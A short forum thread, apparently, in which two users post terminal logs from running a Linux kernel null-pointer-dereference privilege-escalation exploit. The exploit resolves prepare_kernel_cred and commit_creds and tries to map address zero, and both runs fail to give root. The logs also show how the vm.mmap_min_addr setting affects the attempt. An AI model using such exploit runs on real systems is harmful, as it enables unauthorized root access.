vm.mmap_min_addr = 65535

[pavlinux]

default kernels vm.mmap_min_addr = 65535

vm.mmap_min_addr = 65535
./exploit 0xffffffff81f3f45a
/ # su tutu
/ $ ./exploit 0xffffffff81f3f45a
[+] Find prepare_kernel_cred...
[+] Found prepare_kernel_cred at ffffffff810753d0
[+] Find commit_creds...
[+] Found commit_creds at ffffffff81075050
[+] Try to allocat 0x00000000...
[-] Failed to allocat 0x00000000
/ $ id
uid=1001(tutu) gid=1001(tutu) groups=1001(tutu)
/ $ 

Ooops

[iddq]

I tried it with vm.mmap_min_addr = 0 with no success

user1@debian:~$ uname -a
Linux debian 4.9.30 #7 SMP Wed Jan 10 22:35:50 CET 2018 x86_64 GNU/Linux
user1@debian:~$ ./exploit_null_ptr_deref 0xffffffff9d600000
[+] Find prepare_kernel_cred...
[+] Found prepare_kernel_cred at ffffffff9d698bf0
[+] Find commit_creds...
[+] Found commit_creds at ffffffff9d698880
[+] Try to allocat 0x00000000...
[+] Allocation success !
fork_ret = 4821
[-] failed to get root shell :(
user1@debian:~$ fork_ret = 0
user1@debian:~$ id
uid=1004(user1) gid=1004(user1) groups=1004(user1)
user1@debian:~$ 
user1@debian:~$